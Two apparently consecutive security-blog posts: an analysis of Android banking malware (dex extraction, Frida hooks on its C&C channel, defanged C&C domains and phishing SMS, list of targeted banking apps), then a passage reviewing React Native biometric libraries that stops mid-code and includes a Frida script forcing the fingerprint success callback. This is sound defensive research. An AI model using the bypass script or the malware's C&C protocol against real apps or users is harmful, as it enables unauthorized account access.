For my dynamic testing, I’ve installed LineageOS + TWRP on an old Nexus 5, along with Magisk, MagiskTrustUserCerts and Magisk Frida Server. I also installed ProxyDroid and configured it to connect to my Burp Proxy. Finally, I installed Burp’s certificate, made sure everything was working and then performed a backup using TWRP. This way, I can easily restore my device to a clean state and run the malware sample again and again for the first time. Since the malware doesn’t affect the /system partition, I only need to restore the /data partition. You could use an emulator, but not all malware will have x86 binaries and, furthermore, emulators are easily detected. There are certainly drawbacks as well, such as the restore taking a few minutes, but it’s currently fast enough for me to not be annoyed by it.

Resetting a device is easy with TWRP

Making and restoring backups is pretty straightforward in TWRP. You first boot into TWRP by executing ‘adb reboot recovery‘. Each phone also has specific buttons you can press during boot, but using adb is much nicer and more consistent.
In order to create a backup, go to Backup and select the partitions you want to create a backup of. In this case, we should do System, Data and Boot. Slide the slider at the bottom to the right and wait for the backup to finish.
In order to restore a backup, go to Restore and select the backup you created earlier. You can choose which partitions you want to restore and then swipe the slider to the right again.

After setting up a device and creating a project, we can start analyzing. Unfortunately, the latest version of Dexcalibur wasn’t too happy with the SMALI code inside the sample. Some lines have whitespace where it isn’t supposed to be, and there are a few illegal constructions using array definitions and goto labels. Both of them were fixed within 24 hours of reporting which is very impressive!

When something doesn’t work…

Almost all the tools we use in mobile security are free and/or open source. When something doesn’t work, you can either find another tool that does the job, or dig into the code and figure out exactly why it’s not working. Even by just reporting an issue with enough information, you’re contributing to the project and making the tools better for everyone in the future. So don’t hesitate to do some debugging!

So after pulling the latest code (or making some quick hotpatches), we can run the sample using Dexcalibur. All hooks are enabled by default, and when running the malware, Dexcalibur lists all of the reflection API calls that we saw earlier:

We can see that some visual components are created, which matches what we see on the device: the malware asking for accessibility permissions.

At this point, one of the items in the hooks log should be the dynamic loading of the decrypted dex file. However, there’s no such call and this actually had me puzzled for a little while. I thought maybe there was another bug in Dexcalibur, or maybe the sample was using a class or method not covered by Dexcalibur’s default list of hooks, but none of this turns out to be the case.

Frida is too late 🙁

Frida scripts only run when the runtime is ready to start executing. At that point, Android will have loaded all the necessary classes but hasn’t started execution yet. However, static initializers are run during the initialization of the classes which is before Frida hooks into the Android Runtime. There’s one issue reported about this on the Frida GitHub repository but it was closed without any remediation. There are a few ways forward now:

  • We manually reverse engineer the obfuscated code to figure out when the dex file is loaded into memory. Usually, malware will remove the file from disk as soon as it is loaded in memory. We can then remove the function that removes the decrypted dex file and simply pull it from the device.
  • We dive into the smali code and modify the static initializers to normal static functions and call all of them from the MainActivity.onCreate method. However, since the Activity defined in the manifest is inside the encrypted dex file, we would have to update the manifest as well, otherwise Android would complain that it can’t find the main activity as it hasn’t been loaded yet. A real chicken/egg problem.
  • Most (all?) methods can be decompiled by at least one of the decompilers in Bytecode Viewer, and there aren’t too many methods, so we could copy everything over to a new Android project and simply debug the application to figure out what is happening. We could also trick the new application into decrypting the dex file for us.

But… none of that is necessary. While figuring out why the hooks weren’t called, I took a look at the application’s storage: after the sample has been run once, it actually doesn’t delete the decrypted dex file and simply keeps it in the app folder.

So we can copy it off the device by moving it to a world-readable location and making the file world-readable as well.

kali > adb shell
hammerhead:/ $ su
hammerhead:/ # cp /data/data/com.tencent.mobileqq/app_apkprotector_dex /data/local/tmp/classes-v1.bin
hammerhead:/ # chmod 666 /data/local/tmp/classes-v1.bin
hammerhead:/ # exit
hammerhead:/ $ exit
kali > adb pull /data/local/tmp/classes-v1.bin payload.dex
/data/local/tmp/classes-v1.bin: 1 file pulled. 18.0 MB/s (3229988 bytes in 0.171s)

But now that we’ve got the malware running, let’s take a quick look at Burp. Our goal is to intercept C&C traffic, so we might already be done!

While we are indeed intercepting C&C traffic, everything seems to be encrypted, so we’re not done just yet.

… and back to static

Since we now have the decrypted dex file, let’s open it up in Bytecode Viewer again:

The payload doesn’t have any real anti-reverse engineering stuff, apart from some string obfuscation. However, all the class and method names are still there and it’s pretty easy to understand most functionality. Based on the class names inside the com.tencent.mobileqq package we can see that the sample can:

  • Perform overlay attacks (BrowserActivity.class)
  • Start different intents (IntentStarter.class)
  • Launch an accessibility service (MyAccessibilityService.class)
  • Compose SMS messages (ComposeSMSActivity)
  • etc…

The string obfuscation is inside the io.michaelrocks.paranoid package (Deobfuscator$app$Release.class) and the source code is available online.

Another interesting class is DGA.class which is responsible for the Domain Generation Algorithm. By using a DGA, the sample cannot be taken down by sink-holing the C&C’s domain. We could reverse engineer this algorithm, but that’s not really necessary as the sample can just do it for us. At this point we also don’t really care which domain it actually ends up connecting to. We can actually see the DGA in action in Burp: Before the sample is able to connect to a legitimate C&C it tries various different domain names (requests 46 – 56), after which it eventually finds a C&C that it likes (requests 57 – 60):

So the payloads are encrypted/obfuscated and we need to figure out how that’s done. After browsing through the source a bit, we can see that the class that’s responsible for actually communicating with the C&C is the PanelReq class. There are a few methods involving encryption and decryption, but there’s also one method called ‘Send’ which takes two parameters and contains references to HTTP related classes:

public static String Send(String paramString1, String paramString2)
{
    try
    {
        HttpCom localHttpCom = new com/tencent/mobileqq/HttpCom;
        localHttpCom.<init>();
        localHttpCom.SetPort(80);
        localHttpCom.SetHost(paramString1);
        localHttpCom.SetPath(Deobfuscator.app.Release.getString(-37542252460644L));
        paramString1 = Deobfuscator.app.Release.getString(-37585202133604L);

We can be pretty sure that ‘paramString1’ is the hostname which is generated by the DGA. The second string is not immediately added to the HTTP request and various cryptographic functions are applied to it first. This is a strong indication that paramString2 will not be encrypted when it enters the Send method. Let’s hook the Send method using Frida to see what it contains.

The following Frida script contains a hook for the PanelReq.Send() method:

Java.perform(function(){
    var PanelReqClass = Java.use("com.tencent.mobileqq.PanelReq");
    PanelReqClass.Send.overload('java.lang.String', 'java.lang.String').implementation = function(hostname, payload){
        console.log("hostname:"+hostname);
        console.log("payload:"+payload);
        var retVal = this.Send(hostname, payload);
        console.log("Response:" + retVal)
        console.log("------");
        return retVal;
    }
});

Additionally, we can hook the Deobfuscator.app.Release.getString method to figure out which strings are returned after decrypting them, but in the end this wasn’t really necessary:

var Release = Java.use("io.michaelrocks.paranoid.Deobfuscator$app$Release");
Release.getString.implementation = function (id){
    var retVal = this.getString(id);
    console.log(id + " > " + retVal);
    console.log("---")
    return retVal;
}

Monitoring C&C traffic

After performing a reset of the device and launching the sample with Frida and the overloaded Send method, we get the following output:

...
hostname:vtcslaabqljbnco[.]com
payload:PREPING,
Response:null
------
hostname:urqisbcliipfrac[.]com
payload:PREPING,
Response:null
------
hostname:vloxaloyfmdqxti[.]ru
payload:PREPING,
Response:OK
------
hostname:cjcpldfquycghnf[.]ru
payload:PREPING,
Response:null
------
Response:nullhostname:vloxaloyfmdqxti[.]ru
payload:PING,3.4,10,LGE,Nexus 5,en,127,
Response:
------
hostname:vloxaloyfmdqxti.ru
payload:SMS_RATE
Response: 10
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECTS_LIST,com.google.android.carriersetup,org.lineageos.overlay.accent.black,com.android.cts.priv.ctsshim,org.lineageos.overlay.accent.brown,...,com.android.theme.icon_pack.circular.android,com.google.android.apps.restore
Response:
------
hostname:vloxaloyfmdqxti[.]ru
payload:LOG,AMI_DEF_SMS_APP,1
Response:OK
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:648516978,Capi: El envio se ha devuelto dos veces al centro mas cercano codigo: AMZIPH1156020 
 http://chiangma[...].com/track/?sl6zxys4ifyp
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:634689547,No hemos dejado su envio 01101G573629 por estar ausente de su domicilio. Vea las opciones: 
 http://chiangma[...].com/track/?7l818osbxj9f
------
hostname:vloxaloyfmdqxti[.]ru
payload:GET_SMS
Response:699579720,Hola, no te hemos localizado en tu domicilio. Coordina la entrega de tu envio 279000650 aqui: 
 http://chiangma[...].com/track/?uk5imbr210yue
------
hostname:vloxaloyfmdqxti[.]ru
payload:LOG,AMI_DEF_SMS_APP,0
Response:OK
------
hostname:vloxaloyfmdqxti[.]ru
payload:PING,3.4,10,LGE,Nexus 5,en,197,
Response:
------
...

Some observations:

  • The sample starts by querying different domains until it finds one that answers ‘OK’ (Line 14). This matches what we saw in Burp.
  • It sends a list of all installed applications to see which applications to attack using an overlay (Line 27). Currently, no targeted applications are installed, as the response is empty.
  • Multiple premium text messages are received (Lines 36, 41, 46, …)

Package names of targeted applications are sometimes included in the apk, or a full list is returned from the C&C and compared locally. In this sample that’s not the case and we actually have to start guessing. There doesn’t appear to be a list of financial applications available online (or at least, I didn’t find any) so I basically copied all the targeted applications from previous malware writeups and combined them into one long list. This does not guarantee that we will find all the targeted applications, but it should give us pretty good coverage.

In order to interact with the C&C, we can simply modify the Send hook to overwrite the payload. Since the sample is constantly polling the C&C, the method is called repeatedly and any modifications are quickly sent to the server:

Java.perform(function(){
    var PanelReqClass = Java.use("com.tencent.mobileqq.PanelReq");
    PanelReqClass.Send.overload('java.lang.String', 'java.lang.String').implementation = function(hostname, payload){
      var injects="GET_INJECTS_LIST,alior.banking[...]zebpay.Application,"
      if(payload.split(",")[0] == "GET_INJECTS_LIST"){
          payload=injects
      }
      console.log("hostname:"+hostname);
      console.log("payload:"+payload);
      var retVal = this.Send(hostname, payload);
      console.log("Response:" + retVal)
      console.log("------");
      return retVal;
    }
});

Frida also automatically reloads scripts if it detects a change, so we can simply update the Send hook with new commands to try out and it will automatically be picked up.

Based on the very long list of package names I submitted, the following response was returned by the server to say which packages should be attacked:

-----
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECTS_LIST,alior.banking[...]zebpay.Application
Response:com.bankinter.launcher,com.bbva.bbvacontigo,com.binance.dev,com.cajasur.android,com.coinbase.android,com.grupocajamar.wefferent,com.imaginbank.app,com.kutxabank.android,com.rsi,com.tecnocom.cajalaboral,es.bancosantander.apps,es.cm.android,es.evobanco.bancamovil,es.ibercaja.ibercajaapp,es.liberbank.cajasturapp,es.openbank.mobile,es.pibank.customers,es.univia.unicajamovil,piuk.blockchain.android,www.ingdirect.nativeframe
-----

When the sample receives the list of applications to attack, it immediately begins sending the GET_INJECT command to retrieve an HTML page for each targeted application:

---
hostname:vloxaloyfmdqxti[.]ru
payload:GET_INJECT,es.evobanco.bancamovil
Response:<!DOCTYPE html>
<html>
<head>
    <title>evo</title>
    <link rel="shortcut icon" href="es.evobanco.bancamovil.png" type="image/png">
    <meta charset="utf-8">
....

In order to view the different overlays, we can modify the Frida script to save the server’s response to an HTML file:

if(payload.split(",")[0] == "GET_INJECT"){
       var file = new File("/data/data/com.tencent.mobileqq/"+payload.split(",")[1] + ".html","w");
       file.write(retVal);
       file.close();
}

We can then extract them from the device, open them in Chrome, take some screenshots and end up with a nice collage:

Conclusion

The sample we examined in this post is pretty basic. The initial dropper made it a little bit difficult, but since the decrypted payload was never removed from the application folder, it was easy to extract and analyze. The actual payload uses a bit of string obfuscation but is very easy to understand.

The communication with the C&C is encrypted, and by hooking the correct method with Frida we don’t even have to figure out how the encryption works. If you want to know how it works though, be sure to check out the technical writeups by ProDaft (pdf) and Aleksejs Kuprins.

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

A closer look at the security of React Native biometric libraries

6 April 2021 at 09:43

Many applications require the user to authenticate inside the application before they can access any content. Depending on the sensitivity of the information contained within, applications usually have two approaches:

  • The user authenticates once, then stays authenticated until they manually log out;
  • The user does not stay logged in for too long and has to re-authenticate after a period of inactivity.

The first strategy, while very convenient for the user, is obviously not very secure. The second approach is pretty secure but is a burden for the users as they have to enter their credentials every time. Implementing biometric authentication reduces this burden as the authentication method becomes quite easy and fast for the user.

Developers typically don’t write these integrations with the OS from scratch; instead, they use libraries provided either by the framework or by a third party. This is especially true when working with cross-platform mobile application frameworks such as Flutter, Xamarin or React Native, where such integrations need to be implemented in platform-specific code. As authentication is a security-critical feature, it is important to verify whether those third-party libraries have securely implemented the required functionality.

In this blog post, we will first take a look at the basic concept of biometric authentication, so that we can then investigate the security of several React Native libraries that provide support for biometric authentication.

TLDR;

We analyzed five React Native libraries that provide biometric authentication. For each of these libraries, we analyzed how the biometric authentication is implemented and whether it correctly uses the cryptographic primitives provided by the OS to secure sensitive data.

Our analysis showed that only one of the five analyzed libraries provides a secure result-based biometric authentication. The other libraries only offer event-based authentication, which is insecure as the biometric authentication is only validated without actually protecting any data in a cryptographic fashion.

The table below provides a summary of the type of biometric authentication offered by each analyzed library:

Library                              Event-based*   Result-based*
react-native-touch-id                ✓
expo-local-authentication            ✓
react-native-fingerprint-scanner     ✓
react-native-fingerprint-android     ✓
react-native-biometrics              ✓              ✓
* See below for definitions

Biometric authentication

Biometric authentication allows the user to authenticate to an application using their biometric data (fingerprint or face recognition). In general, biometric authentication can be implemented in two different ways:

  • Event-based: the biometric API simply returns the result of the authentication attempt to the application (“Success” or “Failure”). This method is considered insecure;
  • Result-based: upon a successful authentication, the biometric API retrieves some cryptographic object (such as a decryption key) and returns it to the application. Upon failure, no cryptographic object is returned.

Event-based authentication is insecure as it only consists of a boolean value (or similar) being returned. It can therefore be bypassed using code instrumentation (e.g. Frida) by modifying the return value or by manually triggering the success flow. If an implementation is event-based, it also means that sensitive information is stored somewhere in an insecure fashion: after the application has received “success” from the biometric API, it will still need to authenticate the user to the back-end using some kind of credentials, which will be retrieved from local storage. This will be done without needing a decryption key (otherwise the implementation wouldn’t be event-based), which means the credentials are stored on local storage without proper encryption.
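
To illustrate how little effort such a bypass takes, the following hedged Frida sketch forces the success flow for an implementation built on the legacy FingerprintManager API (which one of the libraries analyzed below relies on). Class names and overloads will differ for implementations based on androidx BiometricPrompt, and passing null only works because event-based code never inspects the result object:

// Hedged Frida sketch: skip the fingerprint prompt and trigger the success callback directly.
Java.perform(function () {
    var FingerprintManager = Java.use("android.hardware.fingerprint.FingerprintManager");
    FingerprintManager.authenticate.overload(
        'android.hardware.fingerprint.FingerprintManager$CryptoObject',
        'android.os.CancellationSignal',
        'int',
        'android.hardware.fingerprint.FingerprintManager$AuthenticationCallback',
        'android.os.Handler'
    ).implementation = function (crypto, cancel, flags, callback, handler) {
        // Event-based implementations ignore the AuthenticationResult, so null is good enough.
        callback.onAuthenticationSucceeded(null);
    };
});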

A well-implemented result-based biometric authentication, on the other hand, will not be bypassable with tools such as Frida. To implement a secure result-based biometric authentication, the application must use hardware-backed biometric APIs.

A small note about storing credentials

While we use the term “credentials” in this blog post, we are not advocating for the storage of the user’s credentials (i.e. username and password). Storing the user’s credentials on the device is never a good idea for high-security applications, regardless of the way they are stored. Instead, the “credentials” mentioned above should be credentials dedicated to the biometric authentication (such as a high entropy string), which are generated during the activation of the biometric authentication.

To implement a secure result-based biometric authentication on Android, a cryptographic key requiring user authentication must be generated. This can be achieved by using the setUserAuthenticationRequired method when generating the key. Whenever the application tries to access the key, Android will ensure that valid biometrics are provided. The key must then be used to perform a cryptographic operation that unlocks credentials that can then be sent to the back-end. This is done by supplying a CryptoObject, initialized with the previous key, to the biometric API. For example, the BiometricPrompt class provides an authenticate method which takes a CryptoObject as an argument. A reference to the key can then be obtained in the success callback method, through the result argument. More information on implementing secure biometric authentication on Android can be found in this very nice blogpost by f-secure.

On iOS, a cryptographic key must be generated and stored in the Keychain. The entry in the Keychain must be set with the access control flag biometryAny. The key must then be used to perform a cryptographic operation that unlocks credentials that can be sent to the back-end. By querying the Keychain for a key protected by biometryAny, iOS will make sure that the user unlocks the required key using their biometric data. Alternatively, instead of storing the cryptographic key in the Keychain, we could directly store the credentials themselves with the biometryAny protection.

Being even more secure with fingerprints

Android and iOS allow you to either trust ‘all fingerprints enrolled on the device’, or ‘all fingerprints currently enrolled on the device’. In the latter case, the cryptographic object becomes unusable in case a fingerprint is added or removed.
For Android, the default is ‘all fingerprints’, while you can use setInvalidatedByBiometricEnrollment to delete a CryptoObject in case a fingerprint is added to the device.
For iOS, the choice is between biometryAny and biometryCurrentSet.
While the ‘currently enrolled‘ option is the most secure, we will not put any weight on this distinction in this blogpost.

Is event-based authentication really insecure?

Yes and no. This fully depends on the threat model of your mobile application. The requirement for applications to provide result-based authentication is a Level 2 requirement in the OWASP MASVS (MSTG-AUTH-8). Level 2 means that your application is handling sensitive information and is typically used for applications in the financial, medical or government sector.

OWASP MASVS Verification Levels (source)

If your application uses event-based biometric authentication, there are specific attacks that will make the user’s credentials available to the attacker:

  • Physical extraction using forensics software
  • Extraction of data from backup files (e.g. iTunes backups or adb backups)
  • Malware with root access to the device

This last example would also be able to attack an application that uses result-based biometric authentication, as it would be possible to inject into the application right after the credentials have been decrypted in memory, but the bar for such an attack is much higher than simply copying the application’s local storage.

React Native

React Native is an open-source mobile application framework created by Facebook. The framework, built on top of ReactJS, allows for cross-platform mobile application development in JavaScript. This allows developers to build mobile applications for different platforms at once, using HTML, CSS and JavaScript. Over the past few years it has gained quite some traction and is now used by many developers.

While React Native is a cross-platform framework, some features still require platform-specific development in native Android (Java or Kotlin) or iOS (Objective-C or Swift) code. To get rid of that need, many libraries have seen the light of day that take care of the platform-specific code and expose a JavaScript API that can be used directly in React Native.

Biometric authentication is one such feature that still requires platform-specific code. It is therefore no surprise that many libraries have been created in an attempt to spare developers the burden of having to implement it separately on the different platforms.

A closer look at several React Native biometric authentication libraries

In this section, we will take a look at five libraries that provide biometric authentication for React Native applications. Rather than only focusing on the documentation, we will examine the source code to verify if the implementation is secure. Based on the top results on Google for ‘biometric API react native’ we have chosen the following libraries:

  • react-native-touch-id
  • expo-local-authentication
  • react-native-fingerprint-scanner
  • react-native-fingerprint-android
  • react-native-biometrics

For each library, we have linked to the specific commit that was the latest while writing this blogpost. Please use the latest versions of the libraries in case you want to use them.

React-native-touch-id

GitHub: https://github.com/naoufal/react-native-touch-id/ (Reviewed version)

Library no longer maintained

The library is no longer maintained by its developers and should therefore not be used anymore regardless of the conclusions of our analysis.

In the Readme file, we can already find some hints that the library does not support result-based biometric authentication. The example code given in the documentation contains the following lines of code:

TouchID.authenticate('to demo this react-native component', optionalConfigObject)
    .then(success => {
        AlertIOS.alert('Authenticated Successfully');
    })
    .catch(error => {
        AlertIOS.alert('Authentication Failed');
    });

In the above example, it is clear that it is an event-based biometric authentication as the success method does not verify the state of the authentication, nor does it provide a way for the developers to verify it.

The more astute among you will notice the optionalConfigObject parameter, which could very well contain data that would be used in a result-based authentication, right? Unfortunately, that’s not the case. If we look a bit further in the documentation, we will find the following:

authenticate(reason, config)
Attempts to authenticate with Face ID/Touch ID. Returns a Promise object.
Arguments
    - reason - An optional String that provides a clear reason for requesting authentication.
    - config - optional - Android only (does nothing on iOS) - an object that specifies the title and color to present in the confirmation dialog.

As we can see, the authenticate method only takes the two parameters that were used in the example. In addition, the optional parameter config (optionalConfigObject in the example code), which does nothing on iOS, is used for UI information.

Ok, enough with the documentation, let’s now dive into the source code to see if the library provides a way to perform a result-based biometric authentication.

Android

Let’s first take a look at the Android implementation. We can find the React Native authenticate method in the TouchID.android.js file, which is used to perform the biometric authentication. This method is the only method to perform biometric authentication provided by the library. The following code can be found in the method:

authenticate(reason, config) {
  //...
  return new Promise((resolve, reject) => {
    NativeTouchID.authenticate(
      authReason,
      authConfig,
      error => {
        return reject(typeof error == 'String' ? createError(error, error) : createError(error));
      },
      success => {
        return resolve(true);
      }
    );
  });
}

We can already see in the above code snippet that the success callback does not verify the result of the authentication and only returns a boolean value. The Android implementation is therefore event-based.

iOS

Let’s now take a look at the iOS implementation. Once again, the TouchID.ios.js file only contains one method for biometric authentication, authenticate, which contains the following code:

authenticate(reason, config) {
  //...
  return new Promise((resolve, reject) => {
    NativeTouchID.authenticate(authReason, authConfig, error => {
      // Return error if rejected
      if (error) {
        return reject(createError(authConfig, error.message));
      }

      resolve(true);
    });
  });
}

As we can see, authentication will fail if the error object is set, and will return a boolean value if not. The library does not provide a way for the application to verify the state of the authentication. The iOS implementation is therefore event-based.

As we saw, react-native-touch-id only supports event-based biometric authentication. Applications using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

Expo-local-authentication

GitHub: https://github.com/expo/expo (Reviewed version)

The library only provides one JavaScript method for biometric authentication, authenticateAsync, which can be found in the LocalAuthentication.ts file. The following code is responsible for the biometric authentication:

export async function authenticateAsync(
    options: LocalAuthenticationOptions = {}
): Promise<LocalAuthenticationResult> {
    //...
    const promptMessage = options.promptMessage || 'Authenticate';
    const result = await ExpoLocalAuthentication.authenticateAsync({ ...options, promptMessage });

    if (result.warning) {
        console.warn(result.warning);
    }
    return result;
}

The method performs a call to the native ExpoLocalAuthentication.authenticateAsync method and returns the resulting object. To see which data is included in the result object, we will have to dive into the platform specific part of the library.

Android

The authenticateAsync method called from JavaScript can be found in the LocalAuthenticationModule.java file. The following code snippet is the part that we are interested in:

public void authenticateAsync(final Map<String, Object> options, final Promise promise) {
  
      //...
      Executor executor = Executors.newSingleThreadExecutor();
      mBiometricPrompt = new BiometricPrompt(fragmentActivity, executor, mAuthenticationCallback);

      BiometricPrompt.PromptInfo.Builder promptInfoBuilder = new BiometricPrompt.PromptInfo.Builder()
              .setDeviceCredentialAllowed(!disableDeviceFallback)
              .setTitle(promptMessage);
      if (cancelLabel != null && disableDeviceFallback) {
        promptInfoBuilder.setNegativeButtonText(cancelLabel);
      }
      BiometricPrompt.PromptInfo promptInfo = promptInfoBuilder.build();
      mBiometricPrompt.authenticate(promptInfo);
    }
  });
}

Right away, we can see that the call to BiometricPrompt.authenticate is performed without supplying a BiometricPrompt.CryptoObject. The biometric authentication can therefore only be event-based rather than result-based. For the sake of completeness, let’s verify this assertion by looking at the success callback method:

new BiometricPrompt.AuthenticationCallback () {
  @Override
  public void onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult result) {
    mIsAuthenticating = false;
    mBiometricPrompt = null;
    Bundle successResult = new Bundle();
    successResult.putBoolean("success", true);
    safeResolve(successResult);
  }
};

As expected, the onAuthenticationSucceeded callback method does not verify the value of result and returns a boolean value, which shows that the Android implementation is event-based.

iOS

Let’s now look at the iOS implementation.

The authenticateAsync method called from JavaScript can be found in the EXLocalAuthentication.m file. The following code snippet is the part that we are interested in:

UM_EXPORT_METHOD_AS(authenticateAsync,
                    authenticateWithOptions:(NSDictionary *)options
                    resolve:(UMPromiseResolveBlock)resolve
                    reject:(UMPromiseRejectBlock)reject)
{
    //...
    [context evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics
      localizedReason:reason
        reply:^(BOOL success, NSError *error) {
          resolve(@{
            @"success": @(success),
            @"error": error == nil ? [NSNull null] : [self convertErrorCode:error],
            @"warning": UMNullIfNil(warningMessage),
          });
        }];
}

Just like the Android implementation, the library returns a boolean value indicating whether the authentication succeeded or not. The iOS implementation is therefore event-based.

It is worth noting that the library allows for other authentication methods to be used on iOS (device PIN code, Apple Watch, …). Unfortunately, the implementation of the authentication for the other methods suffers from the same issue as the biometric authentication as can be seen in the following code snippet:

UM_EXPORT_METHOD_AS(authenticateAsync,
                    authenticateWithOptions:(NSDictionary *)options
                    resolve:(UMPromiseResolveBlock)resolve
                    reject:(UMPromiseRejectBlock)reject)
{
  NSString *disableDeviceFallback = options[@"disableDeviceFallback"];
  //...
  if ([disableDeviceFallback boolValue]) {
    // biometric authentication
  } else {
    [context evaluatePolicy:LAPolicyDeviceOwnerAuthentication
      localizedReason:reason
        reply:^(BOOL success, NSError *error) {
          resolve(@{
            @"success": @(success),
            @"error": error == nil ? [NSNull null] : [self convertErrorCode:error],
            @"warning": UMNullIfNil(warningMessage),
          });
        }];
  }
}

As we just saw, the expo-local-authentication library only supports event-based biometric authentication. Developers using this library will therefore not be able to implement a secure biometric authentication.

Result: Insecure event-based authentication

React-native-fingerprint-scanner

Source: https://github.com/hieuvp/react-native-fingerprint-scanner (Reviewed version)

The library provides two different implementations for the two platforms. Let’s start with Android.

Android

The library provides one JavaScript method to authenticate using biometrics, authenticate, which can be found in the authenticate.android.js file. On Android 6.0 and above, the authenticate method will be the following:

const authCurrent = (title, subTitle, description, cancelButton, resolve, reject) => {
  ReactNativeFingerprintScanner.authenticate(title, subTitle, description, cancelButton)
    .then(() => {
      resolve(true);
    })
    .catch((error) => {
      reject(createError(error.code, error.message));
    });
}

On Android versions before Android 6.0, the authenticate method will be the following:

const authLegacy = (onAttempt, resolve, reject) => {
  //...
  ReactNativeFingerprintScanner.authenticate()
    .then(() => {
      DeviceEventEmitter.removeAllListeners('FINGERPRINT_SCANNER_AUTHENTICATION');
      resolve(true);
    })
    .catch((error) => {
      DeviceEventEmitter.removeAllListeners('FINGERPRINT_SCANNER_AUTHENTICATION');
      reject(createError(error.code, error.message));
    });
}

In both cases, the method will return a boolean value if the call to ReactNativeFingerprintScanner.authenticate did not throw an error, and will raise an exception otherwise. The Android implementation is therefore event-based.

iOS

Just like on Android, the library provides one JavaScript method to authenticate using biometrics: authenticate. The implementation of the method can be found in the authenticate.ios.js file and is shown in the following code snippet:

export default ({ description = ' ', fallbackEnabled = true }) => {
  return new Promise((resolve, reject) => {
    ReactNativeFingerprintScanner.authenticate(description, fallbackEnabled, error => {
      if (error) {
        return reject(createError(error.code, error.message))
      }

      return resolve(true);
    });
  });
}

Once again, the method will return a boolean value if the call to ReactNativeFingerprintScanner.authenticate did not return an error. The iOS implementation is therefore event-based.

Similarly to expo-local-authentication, react-native-fingerprint-scanner also supports other authentication methods on iOS. These can be used as fallback methods if the fallbackEnabled parameter is set to true when calling the authenticate method, which is the case by default. As the authenticate method is used for these fallback methods as well, they also suffer from the same issue as the biometric authentication provided by the library.

As we just saw, the react-native-fingerprint-scanner library only supports event-based biometric authentication. Developers using this library will therefore not be able to implement secure biometric authentication.

Result: Insecure event-based authentication

React-native-fingerprint-android

GitHub: https://github.com/jariz/react-native-fingerprint-android (Reviewed version)

As the name of the library suggests, the library only implements biometric authentication on the Android platform.

The library provides one method for biometric authentication, authenticate, which can be found in the index.android.js file. The part that we are interested in is the following:

static async authenticate(warningCallback:?(response:FingerprintError) => {}):Promise<null> {
  //..
  let err;
  try {
    await FingerprintAndroidNative.authenticate();
  } catch(ex) {
    err = ex
  }
  finally {
    //remove the subscriptions and crash if needed
    DeviceEventEmitter.removeAllListeners("fingerPrintAuthenticationHelp");
    if(err) {
      throw err
    }
  }
}

Right away, we can see in the method prototype that the method returns a Promise<null>. This is similar to returning a boolean value, therefore indicating that the biometric authentication provided by the library is event-based.

However, let’s still dive into the Java implementation of FingerprintAndroidNative.authenticate just to be sure.

The implementation of the method can be found in the FingerprintModule.java file. The relevant lines of the method can be found below:

public void authenticate(Promise promise) {
    //...
    fingerprintManager.authenticate(null, 0, cancellationSignal, new AuthenticationCallback(promise), null); 
    //..
}

As we can see, the method performs a call to the FingerprintManager.authenticate method without providing a FingerprintManager.CryptoObject. The biometric authentication can therefore only be event-based rather than result-based. We could convince ourselves even further by inspecting the onAuthenticationSucceeded callback method, but this should already be enough.

As we just saw, the react-native-fingerprint-android library only supports event-based biometric authentication. Developers using this library will therefore not be able to implement secure biometric authentication.

Result: Insecure event-based authentication

React-native-biometrics

GitHub: https://github.com/SelfLender/react-native-biometrics (Reviewed version)

Last, but certainly not least! The library provides two methods to authenticate using biometrics. This looks promising already!

The first method to perform biometric authentication is the simplePrompt method, available in the index.ts file. However, it is clearly mentioned in the documentation that this method only validates the user’s biometrics and that it should not be used for security sensitive features:

simplePrompt(options)
Prompts the user for their fingerprint or face id. Returns a Promise that resolves if the user provides a valid biometrics or cancel the prompt, otherwise the promise rejects.

**NOTE: This only validates a user's biometrics. This should not be used to log a user in or authenticate with a server, instead use createSignature. It should only be used to gate certain user actions within an app.

We will therefore not investigate this method as it should already be clear to the reader that it is an event-based biometric authentication.

The second method to perform biometric authentication in the library is the createSignature method, available in the index.ts file. According to the documentation, to use this method, a key pair must first be created using the createKeys method, and the public key must be sent to the server. The authentication process consists of a cryptographic signature that is sent to and verified by the server. The diagram below, taken from the Readme file, illustrates this process.

Authentication flow (source)

Alright! On paper, this looks pretty secure: a cryptographic signature being verified on the server is a proper way to perform biometric authentication. However, we still need to verify if the cryptographic operations are done properly in the library.

Let’s analyze the platform specific implementations.

Android

To verify that the library uses a secure implementation, we have to verify that:

  • The private key used to perform the signature requires user authentication;
  • The success callback uses the result of the biometric authentication to perform cryptographic operations;
  • The library returns the result of the above cryptographic operations to the application.

So first, let’s analyze the createSignature method from the ReactNativeBiometrics class:

public void createSignature(final ReadableMap params, final Promise promise) {
    //...
    Signature signature = Signature.getInstance("SHA256withRSA");
    KeyStore keyStore = KeyStore.getInstance("AndroidKeyStore");
    keyStore.load(null);

    PrivateKey privateKey = (PrivateKey) keyStore.getKey(biometricKeyAlias, null);
    signature.initSign(privateKey);

    BiometricPrompt.CryptoObject cryptoObject = new BiometricPrompt.CryptoObject(signature);

    AuthenticationCallback authCallback = new CreateSignatureCallback(promise, payload);
    //...
    BiometricPrompt biometricPrompt = new BiometricPrompt(fragmentActivity, executor, authCallback);

    PromptInfo promptInfo = new PromptInfo.Builder()
            .setDeviceCredentialAllowed(false)
            .setNegativeButtonText(cancelButtomText)
            .setTitle(promptMessage)
            .build();
    biometricPrompt.authenticate(promptInfo, cryptoObject);
}

In the above code, we can see that a Signature object is initialized with the private key identified by biometricKeyAlias. A CryptoObject is then initialized with the signature. Finally, we can see that the CryptoObject is correctly given to the BiometricPrompt.authenticate method. Ok, so far so good.

Let’s now take a look at how the used key pair is created:

public void createKeys(Promise promise) {
    //...  
    KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_RSA, "AndroidKeyStore");
